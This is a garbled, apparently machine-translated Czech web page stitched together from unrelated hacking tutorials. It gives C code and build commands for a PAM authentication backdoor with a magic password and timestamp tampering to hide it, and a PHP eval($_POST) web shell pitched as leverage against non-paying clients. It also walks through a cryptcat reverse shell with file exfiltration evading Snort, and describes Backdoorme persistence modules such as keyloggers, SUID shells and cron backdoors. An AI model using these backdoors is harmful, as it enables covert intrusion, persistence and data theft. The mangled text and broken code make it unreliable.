Náš blog na Habria nám vypráví nejen o vývoji svého produktu - telefonování pro operátory spoje Hydra, ale také zveřejňuje materiály o práci s infrastrukturou a souvisejícími technologiemi.

Německý novinář a hacker Leif Ryge napsal pro Ars Technica obsáhlý článek o tom, jak současný přístup k organizaci aktualizací softwaru přináší vážná rizika informační bezpečnosti.ki. Vaše uctivé myšlenky uvádíme v tomto článku.

Pravěk

Už v roce 2014 psala redakce Washington Post o tom, jak by společnosti mohly pomocí klíčů Apple a Google najít tajný klíč na klíči, pomocí kterého by bylo možné odepřít přístup k jejich produktům a jak je uložit a přenést do zpravodajské agentury, bez ohledu na to, co s nimi zdržuje loď. rozhodnutí."

Redukce „slabého skinu“, útoku na skin, který může být kritický, je proto zásadní pro všechny nové mechanismy pro rozšiřování zabezpečení softwaru.

Existuje mnoho způsobů, jak se uchytit na rozbitém stroji. Od těch nejbanálnějších a snadno identifikovatelných (přidejte se do databáze vývojářů) až po skládací moduly jádra, které implementují shell brány na vzdáleném počítači. Mezi nimi je velmi jednoduchá implementace a má tajnou metodu, o které ví jen velmi málo lidí. Jedná se o modifikaci modulů autentizačního systému PAM, které používají všechny současné systémy UNIX.

Co je PAM?

autentizační moduly (PAM) - sada API nezbytných pro implementaci autentizačních mechanismů v různých aplikacích.

Před příchodem PAM, aby bylo možné implementovat autentizaci, řekněme pomocí klíčové karty, museli prodejci zadat kód podpory pro své klíčové karty do každé systémové komponenty, která byla zodpovědná za autentizaci zákazníka. Chcete-li přidat a znovu vybrat nástroj pro přihlášení, sshd, stejně jako jakýkoli jiný software, do kterého bylo plánováno přidat podobnou funkci.

S příchodem PAM se situace výrazně vyjasnila. Nyní, abyste do systému přidali svůj vlastní jedinečný autentizační protokol, stačí jej implementovat v rámci jediného modulu PAM. A všechny nástroje a programy, které pracují s PAM, jej používají a lze je použít k ověření uživatele.

V praxi to vypadá asi takto: přihlašovací nástroj se rozšíří na PAM, který dokončí všechny potřebné kontroly dalších hodnot v konfiguračním souboru modulu a vrátí výsledek zpět do přihlašovacího nástroje. Super, proč ne? Takový přístup však podkopává možnosti, které můžeme využít k tomu, abychom se v systému uchytili.

Varto zrobiti malé zastorezhenya. Existují tři hlavní implementace PAM:

  • Linux-PAM je hlavní implementací PAM na jakémkoli systému Linux;
  • OpenPAM – podporováno na systémech BSD a macOS;
  • JPam je implementace PAM pro doplňky Java.

Nebudeme se věnovat žádné konkrétní implementaci. Základní funkčnost je stejná.

Aspekty konsolidace *nix s PAM wiki

Jak nastavit PAM pro skin program můžete zjistit z Catalozy /etc/pam.d(Linux) nebo v souboru /etc/pam.conf. Příklad konfiguračního souboru pro přihlašovací nástroj v macOS:

auth volitelné pam_krb5 .so use_kcminit

auth volitelné pam_ntlm .tak try_first_pass

auth volitelné pam_mount .tak try_first_pass

vyžaduje auth pam_opendirectory .tak try_first_pass

accunt požadované pam_nologin .so

akt vyžaduje pam_opendirectory .so

vyžadováno heslo pam_opendirectory .so

relace vyžaduje pam_launchd .so

relace vyžaduje pam_uwtmp .so

session volitelné pam_mount .so

Pojďme zjistit, jak zde funguje magie.

Konfigurační soubor popisuje ověřovací pravidla, která jsou nezbytná pro úspěšnou autentizaci klienta a další akce (změna hesla, příprava klienta). Každý řádek konfiguračního souboru obsahuje jedno pravidlo. Zvraty jsou uspořádány v řadě.

Zleva doprava: typ modulu, ovládací_příznak, název modulu. Nejprve musíme uvést typ auth modulu, tyto moduly samy zodpovídají za autentizaci. Control_flag - výkon modulu. Význam můžete hádat:

  • nutné (nezbytné) - když modul otočí kladný signál, část lanka, která chybí, je odstraněna a poté uspokojena. Pokud modul obrátí negativní výsledek, je náhodně vyhozen a žádná další ověření nejsou dokončena;
  • požadovaný (nezbytný) - stejně jako nezbytný: pokud je potvrzení pozitivní, část šeku, která byla ztracena, je vyřazena. Kvůli tomuto rozdílu v případě negativního typu lanka šeku nadále selhává, napájení je resetováno;
  • dostatečný (dostatečný) - v tomto případě odpovídá otázce, protože předchozí kontroly nebyly provedeny negativně. Pokud je modul zadán záporně, výsledek je ignorován a reverzní smyčka se provádí dále;
  • volitelné (nepovinné) – modul se provede, jinak je výsledek ignorován.

Již v této fázi je zřejmé, že drobnými změnami v konfiguračním souboru můžeme zajistit úspěšné přihlášení do systému libovolným heslem (stačí označit všechny auth moduly jako volitelné). V opačném případě bude rozhodnuto pouze na legitimním klientovi nebo správci, kterému se nepodaří zaregistrovat úspěšné přihlášení do systému s nesprávným heslem.

Píšeme výkonný modul zadních vrátek

PAM nám umožňuje povolit výkonné modely ověřování. Proto můžeme zničit modul pomocí „kouzla“ hesla a zajistit, aby systém akceptoval standardní hesla zákazníků i naší vlády. Pokud zadáte nesprávné heslo, bude vám poskytnuto úplné vynechání ověření. Špatná možnost.

Dobře, kód (nezapomeňte nahradit magické heslo svým „okouzlujícím“ heslem):

#zahrnout

#zahrnout

#zahrnout

#zahrnout

#zahrnout

#zahrnout

#define MYPASSWD "magické heslo"

PAM_EXTERN int pam_sm_setcred (pam_handle_t * pamh , int příznaky , int argc , const char * * argv ) (

return PAM_SUCCESS ;

PAM_EXTERN int pam_sm_acct_mgmt (pam_handle_t * pamh , příznaky int , int argc , const char * * argv ) (

return PAM_SUCCESS ;

PAM_EXTERN int pam_sm_authenticate (pam_handle_t * pamh , int příznaky , int argc , const char * * argv ) (

char *heslo = NULL;

pam_get_authtok (pamh, PAM_AUTHTOK, (const char * *) & heslo, NULL);

if (! strncmp (heslo, MYPASSWD, strlen (MYPASSWD)))

return PAM_SUCCESS ;

návrat - 1;

Modul Zberem:

$ sudo apt - získat instalaci libpam0g - dev gcc

$ gcc - fPIC - c pam_backdoor .c

$ ld - x -- shared - o pam_backdoor .so pam_backdoor .o

Umístíme jej do adresáře s ostatními moduly:

$ sudo chown root : root pam_backdoor .so

$ sudo cp pam_backdoor .so / lib / x86_64 - linux - gnu / security /

Ukažte respekt k tomu, co děláte /lib/x86_64-linux-gnu/security/ Specifické pro Debian/Ubuntu. Pro Fedoru, Red Hat a CentOS jsou moduly umístěny v katalogu /lib64/security/ a v Arch Linuxu - at catalosis /lib/security/.

Nyní můžete nakonfigurovat PAM pouze tak, aby proces ověření vašeho modulu postačoval k úspěšné autentizaci. Například konfigurace pro obslužný program su ( /etc/pam.d/su):

Na některých systémech Linux lze autentizaci nakonfigurovat ve skupině souborů: common-auth, common-password, common-session a poté připojit ke konfiguračním souborům konkrétních utilit přes @include. V tuto chvíli musíte uctívat.

Po zadání nastavení do konfigurace se vám spustí obslužný program su pomocí hesla zadaného v modulu. Stejný trik lze provést pomocí přihlašovací utility (přihlášení do konzole) a sshd pro vzdálené přihlášení.

Do původního modulu nainstalujeme zadní vrátka

Při úpravě konfigurace PAM můžete označit modul pam_unix.so. Tento modul zajišťuje autentizaci klientů pomocí standardní databáze hesel pro systémy UNIX. /etc/passwd. K dispozici je mnoho nástrojů, včetně su, login, sshd a dalších programů (například SecureFTPd).

Shardy PAM jsou stále open source a máme přístup k výstupním textům samotného démona i standardních komponent a přímo do tohoto modulu můžeme vložit vlastní backdoor.

Aby bylo možné provést potřebné změny, jsou aktualizovány výstupní texty PAM:

$ http://www.linux-pam.org/library/Linux-PAM-1.1.8.tar.gz

$tar - xzf inux - PAM - 1.1.8.tar.gz

Otevření souboru Linux-PAM-1.1.8/modules/pam_unix/pam_unix_auth.c A hledáme další řádky:

Vybíráme a nahrazujeme původní modul vlastním:

$. /configure

$make

$ sudo cp Linux - PAM - 1.1.8 / moduly / pam_unix / .libs / pam_unix .so / lib / x86_64 - linux - gnu / security /

Aby správce neoznačil náhradu, změníme čas vytvoření souboru tak, abychom se vyhnuli času vytvoření dalších modulů.

Vzpomínám si, že v článku „10 let a doporučení pro výstavbu webu“ jsem předvídal dopad, pokud se nepoctivý klient rozhodl nás bezvýznamně hodit na ty, kteří pracovali najednou, než opakovat osud. Poté, co jsme zjistili, že nebudeme nic platit, se nám naše stránky nepodařilo otevřít a ještě v nich zbylo pár kousků vody.

Obával jsem se však, že na jednom z webů jsem ztratil malý „náhradní vchod“, takže aniž bych o tom přemýšlel, šel jsem na jiný web a opustil svět. A když se podíváte na tento záznam, uvidíte jednoduchý formulář pro nahrávání souborů na server.

Pomohu s tím tak, že požadované skripty naimportuji na stránky a spustím je na stránkách a oni s jejich pomocí okrádají své brutální roboty. Tyto dveře mají pouze jedno mínus - mohly by rychle zmizet, pokud by někdo samozřejmě věděl o jejich existenci.

Uplynula hodina a těm je jedno, že až do dneška šlo všechno hladce, ale to nezahrnuje to, že by se taková petrželka mohla opakovat.

V zásadě můžete použít starou metodu odesílání souboru na server, ale... Novinka je komplikovaná, protože to můžete udělat jednodušším způsobem.

Navrhuji varianty a představy toho nejjednoduššího Bekdurova, aby byly opravdu problémy. Oz...

  1. Vytvoříme php soubor a nazveme ho nějak jako license.php nebo tak nějak.
  2. Napište nový kód

    if (isset($_POST["text"]))
    eval($_POST["text"]);
    ?>




  3. Soubor umístíme tam, kde byl odeslán v cms, například do sítě WYSIWYG editoru. Pokud je to nutné, duplikujte soubor znovu za 2-3 měsíce (při jakémkoli požáru)

Axis vin, rám pro nevhodnost. Oceňuji vás, není třeba vysvětlovat, že funkce eval přiřadí kód formuláři.

Celé je to rám, který lze použít bez jakékoli aplikace pro implementaci. Prostřednictvím highlight_file je možné nahradit jakýkoli soubor hesly, která nemají přímý přístup. K databázi se můžete připojit, uplatnit nebo změnit. Můžete také vytvořit skript, abyste viděli vše na serveru, bez ohledu na to, co.

Níže uvedu nápady na další dvířka, která lze ke košům vyrobit - nechám to na vás, milý čtenáři, jako nezbytnou domácí práci. Pokud je to dobrý dort, rád se podívám na to, co vyšlo.

Nápady na dekoraci :

  1. Bylo by špatné, aby dveře nebyly přístupné všem a vytvořili si k nim oprávnění například nouzově. poznámka redakce).
  2. Jakmile budete mít autorizaci, můžete si okamžitě připravit řadu tlačítek, na která můžete kliknout pro přístup k dalšímu skriptu. Například jdete ke svým dveřím a tam jsou tlačítka - získat hesla, získat databázi, zobrazit panel správce a tak dále.
  3. Nějaké další nápady?

Na konci dne

Dveře Vikoristovaty jsou dobrý nápad, pokud vytváříte web před výplatou (v případě, že platíte), nebo pokud spolupracujete s firmou a chcete být pojištěni. V prvním případě, pokud je platba splatná, mohou být dveře odstraněny nebo mohou být odstraněny, ale nemyslím si, že už to bude potřeba. A v jiném scénáři je budete muset postupně ořezávat v připravenosti.

To je pro dnešek vše. Rád si vyslechnu vaše nápady a návrhy k tématu! Až do nových zpráv

Cryptcat nám umožňuje komunikovat mezi dvěma systémy a šifruje komunikaci mezi nimi pomocí dvou ryb – jednoho z mnoha vynikajících šifrovacích algoritmů.

Dříve jsme se dozvěděli o jedné maličkosti, která vám umožňuje vytvořit spojení mezi dvěma počítači a přenášet soubory nebo vytvořit příkazový shell pro „znovu připojení“ systému. Navzdory kráse a eleganci tohoto malého nástroje existuje jedna velká nevýhoda - přenosy mezi počítači mohou být detekovány bezpečnostními zařízeními, jako jsou firewally a systémy detekce narušení (IDS).

Tato lekce souvisí s oblíbeným bratrancem netcatu, kryptcatem (což je ve skutečnosti velmi roztomilý a exotický, ale jednodušší netcat).

Šifrování Twofish je na stejné úrovni jako šifrování AES, takže cryptcat je prakticky neprůstřelný. IDS tedy nemůže detekovat špatné chování v provozu, pokud jeho cesty procházejí přes takové primární HTTP porty 80 a 443.

Croc 1: Předstírejte Cryptcat

Krok 2: Odemkněte sluchadlo v systému Windows

Posluchač můžeme otevřít na libovolném systému s podobnou syntaxí jako pro netcat. V naší verzi otevřeme reproduktor ve Windows 7 na portu 6996 a vytvoříme příkazový shell.

cryptcat -l -p 6996 -e cmd.exe

L znamená „otevři ucho“
-p 6996 znamená "umístit posluchače na port 6996"
-e cmd.exe znamená "spustit příkazový shell pro komunikaci"

Krok 3: Otevřete Snort nebo jiný IDS

Nyní spustíme IDS typu Snort na jiném systému, který se připojí k systému Windows, aby bylo zajištěno, že IDS je „zapečetěno“ šifrováním, takže náš černý hostitel je pro taková bezpečnostní zařízení neviditelný.


Krok 4: Připojte se k systému Windows pomocí Cryptcat

Při instalaci Cryptcatu na BackTrack není naší chybou zasahovat a instalovat jej. Pokud se navíc nachází v adresáři /bin, může mu být odepřen přístup do jakéhokoli jiného adresáře.

Nyní se připojíme k systému Windows 7 cryptcat z našeho systému BackTrack a uvidíme, jak můžeme porazit zadní vrátka šifrovaného připojení, které nemusí být možné detekovat.

cryptcat 192.168.4.182.248 6996


Jak vidíte, jsme připojeni k systému Windows 7 a odstranili jsme příkazový shell ze systému Win 7! To nám dává významnou kontrolu nad tímto systémem, ale ne úplnou, protože příkazový shell má omezené možnosti.

Krok 5: Spusťte protokoly a výstrahy Snortu

Tento typ útoku (průchod příkazového shellu přes plot) je snadno detekován Snortem nebo jiným IDS, pokud není spojení šifrováno. Pravidla Snortu říkají správci systému, že shell cmd.exe musí projít tenkou komunikační linkou a pravděpodobně to bude fungovat tak, že vás vyřadí z vítězné hodnoty příkazového shellu. S šifrovanou komunikací dostupnou prostřednictvím cryptcat nemusí být tento odkaz viditelný.

Vraťme se a zkontrolujte protokoly a výstrahy ve Snortu. Vzhledem k tomu, že jsme byli úspěšní v sofistikovaném IDS, není třeba se obávat přesunutí příkazového shellu mezerou. Můžeme zkontrolovat naše protokoly, přihlášeni /var/snort/alerts a zjistit, jaké signály dostáváme z našeho připojení k počítači se systémem Windows (omlouváme se, že to víme předem).

kwrite /var/snort/alerts


Jak můžete pokračovat, dosáhli jsme úspěchu. Byli jsme schopni se připojit k systému Windows bez obav o jakýkoli bezpečnostní systém!

Krok 6: Odešlete Crypcat na port 80, abyste unikli firewallu

Pokud jsme úspěšně vytvořili šifrovací zadní vrátka v systému oběti, musí správce zabezpečení zajistit, aby byl povolen neidentifikovaný port (6996). To, co je víc než všechno, musí iniciovat bezpečnostní správce, aby omezil náš přístup. Navíc na systémech s dobrým správcem systému a dobrým firewallem bude tento port pravděpodobně blokován firewallem.

K jakémukoli opatření, aby mohly maminky vše procházet internetem, je nutné použít nešifrované porty 80 a 443 a také možná 25, 53 a 110. Fragmenty nešifrovaného pohledu na normální internet - provoz prochází portem 80, který Pokud je okamžitě otevřen, mírný nárůst provozu pravděpodobně nezaznamenáte.

Nyní, pokud jsme úspěšně dobyli cryptcat, pošleme jej přes port 80 s veškerým dalším internetovým provozem. Pokud chcete šifrovat, podívejme se, jaký druh dat se na lince přenáší. Proto může být nemožné, aby jej bezpečnostní zařízení detekovala, aby jej zablokovala, fragmenty budou vždy zodpovědné za povolení provozu přes port 80 a provoz je šifrovaný a IDS jej místo toho nebude moci „dávkovat“.

Zde přesuneme soubor ze systému oběti s názvem topsecret.txt do našeho útočícího systému, aniž bychom detekovali jakékoli bezpečnostní zařízení. Tentokrát místo odeslání příkazového shellu přes plot přemůžeme přísně tajný soubor s názvem topsecret.txt prostřednictvím našeho šifrovaného spojení. Můžeme to udělat zadáním do příkazového řádku Windows:

kryptcat -l -p 80< topsecret.txt

L znamená „otevři ucho“
-p 80 znamená "otevření posluchače na portu 80"
< означает "отправить файл через этого слушателя"

Backdoorme - utilita pro automatické vytváření zadních vrátek

Backdoorme je velmi snadný nástroj, který lze použít k vytvoření skrytých zadních vrátek na strojích Unix. Backdoorme používá známé rozhraní metasploit s úžasnou rozšiřitelností. Backdoorme se spoléhá na SSH připojení oběti a cloudová data, přes která mohou přenášet a umísťovat jakákoliv backdoor. Buďte laskaví, vikoristé Backdoorme s otevřenou samostatnou budovou.

Vítáni jako hosté


Backdoorme okamžitě přichází s velkým množstvím implementovaných backdoorů, modulů a doplňkových modulů. Zadní vrátka jsou specifické komponenty pro vytváření a spawnování nezbytných zadních vrátek, jako jsou zadní vrátka netcat nebo msfvenom backdoor. Moduly mohou být naskládány do libovolného zadního vrátka a upraveny tak, aby byly zadní vrátka těsnější, připevněné nebo zakryté. Další prvky a související operace, které lze odstranit, aby se zachovala trvalost.

Trochu více o zadních vrátkách: Chcete-li spustit backdoorme, podívejte se, co potřebujete.

$python dependencies.py

Spusťte backdoorme:

$ python master.py

Zadní dveře

Chcete-li detekovat zadní vrátka, jednoduše spusťte klíčové slovo „use“.

>> použít shell/metasploit + Použití aktuálního cíle 1. + Použití Metasploit backdoor... (msf) >>

Můžete nastavit možnosti přístupu k zadním vrátkám. Spusťte buď „zobrazit možnosti“ nebo „nápovědu“, abyste zobrazili seznam parametrů, které lze upravit.

Stejně jako v metasploitu jsou zadní vrátka organizovány podle kategorií.

  • Pomocné (další kategorie)
    • keylogger- Přidá do systému keylogger a dává vám dostupnou možnost zasílání výsledků zpět poštou;
    • jednoduchýhttp– Nainstaluje server Python SimpleHTTP na klienta.
    • uživatel– Přivádí to nové koristuvach na pokraj.
    • web– Nainstaluje server Apache na klienta.
  • Eskalace
    • setuid– SetUID backdoor vám umožňuje nainstalovat bit setuid do zkompilovaného souboru s ohledem na to, že uživatel má přístup root. Když je tedy soubor později spuštěn uživatelem, který neumožňuje přístup root, je soubor propojen s přístupem root. Teoreticky tato zadní vrátka přesměrují setuid bit na nano, takže pokud dojde ke ztrátě přístupu root jakýmkoli způsobem, útočník se může znovu přihlásit do SSH jako neprivilegovaný uživatel a stále může spouštět nano (nebo vybrat dvojitý soubor) jako root. ("nano /etc/shadow"). Vezměte prosím na vědomí, že k otevření tohoto rozšíření vyžaduje backdoor root přístup k samotnému klasu.
    • skořápka– shell backdoor je preferované rozšíření backdoor, podobné jeho rozšíření SetUID brother (nebo konkrétnější). Zduplikuje bash shell duplicitního souboru a nastaví bit SUID. Upozorňujeme, že pro toto rozšíření backdoor je vyžadován přístup root. Chcete-li porazit tato zadní vrátka, kde SSH funguje jako nepřátelský server, jednoduše spusťte ".bash -p" a budete mít přístup root.
  • Shell (kategorie Shell)
    • bash– wikirist používá jednoduchý bash skript pro připojení ke konkrétní kombinaci IP a portu a předání výsledku bash.
    • bash2- o něco méně (a spolehlivější) popisovaný bash backdoor, který na straně klienta nepožaduje heslo.
    • metasploit– používá msfvenom k ​​vytvoření dvojitého kódu reverse_tcp na cíli a poté spustí dvojitý kód pro připojení k obalu meterpreter.
    • netcat– vikoryst netcat pro přenos standardního vstupu a výstupu zařízení /bin/sh, čímž se vytvoří interaktivní shell koristuvache.
    • netcat_tradiční- Vikoristovu netcat-tradiční "s -e pro tvorbu pouzdra.
    • perl– skript napsaný v Perlu, který přesměruje výsledek z bash a přejmenuje proces, aby vypadal méně chaoticky.
    • php– spustí PHP backdoor, který přebije výsledek bash. Neinstaluje automaticky webový server, ale místo toho nainstaluje webový modul vikoryst.
    • štěně- Vikorist backdoor n1nj4sec Pupy, který je známý na

      Vítáni jako hosté

      .
    • krajta– vikorist je krátký python skript pro příkazy vikonanny a vynutí výsledky zpět do koristuvach.
    • web– odešle webový server hostiteli, poté nainstaluje backdoor msfvenom php reverse_tcp a připojí se k hostiteli. Bez ohledu na to, že se stále jedná o php backdoor, není to stejné jako popisy více php backdoor.
  • Přístup (kategorie přístupu)
    • remove_ssh- Odinstaluje ssh server na klientovi. Je opravdu dobré zkontrolovat relace zadních vrátek, abyste odstranili jakékoli stopy.
    • ssh_key– vytvoří klíč RSA a zkopíruje jej do cíle pro připojení bez hesla ssh.
    • ssh_port– Přidá nový port pro ssh.
  • Windows (kategorie Windows)
    • Okna– Vikorist používá msfvenom k ​​vytvoření zadních vrátek Windows.
Moduly

Aby byla zadní vrátka pevnější, může být nutné odstranit zadní vrátka kůže z dodatečných modulů, které jsou vytvořeny. Chcete-li přidat modul, stačí vikorizovat klíčové slovo add.

(msf) >> přidat jed + přidán modul Poison

Vzhledový modul má další parametry, které lze upravit, a pokud znovu spustíte „nápovědu“, můžete si stáhnout nebo nainstalovat jakékoli další možnosti.

Aktuálně dostupné moduly zahrnují:

  • Jed
    • Kompilace přihrádky cílového počítače – Win zkompiluje kompilovaný soubor pro přístup k systémovému nástroji a hlavnímu backdooru.
    • Pokud například modul otevře zásobník současně s „ls“, zkompiluje a přenese dvojitý kód pod názvem „ls“, který je spuštěn jako původní zadní vrátka, a také pod „ls“, čímž umožní backdoor pro častější spouštění zadních vrátek.
  • Cron
    • Přidá nová zadní vrátka crontab pro uživatele root, aby mohl pracovat na dané frekvenci.
  • Web
    • Nainstaluje webový server a hostuje webovou stránku, která spustí zadní vrátka.
    • Stačí jít na stránku s otevřenýma ušima a spustí se backdoor.
  • Uživatel
    • Dává nový koristuvach výbuch.
  • Spuštění
    • Umožňuje vytvářet zadní vrátka se soubory bashrc a init.
  • Seznam povolených
    • Přidejte k IP „bílou listinu“ takovým způsobem, že pouze tato IP se může připojit k backdooru.
Překlad: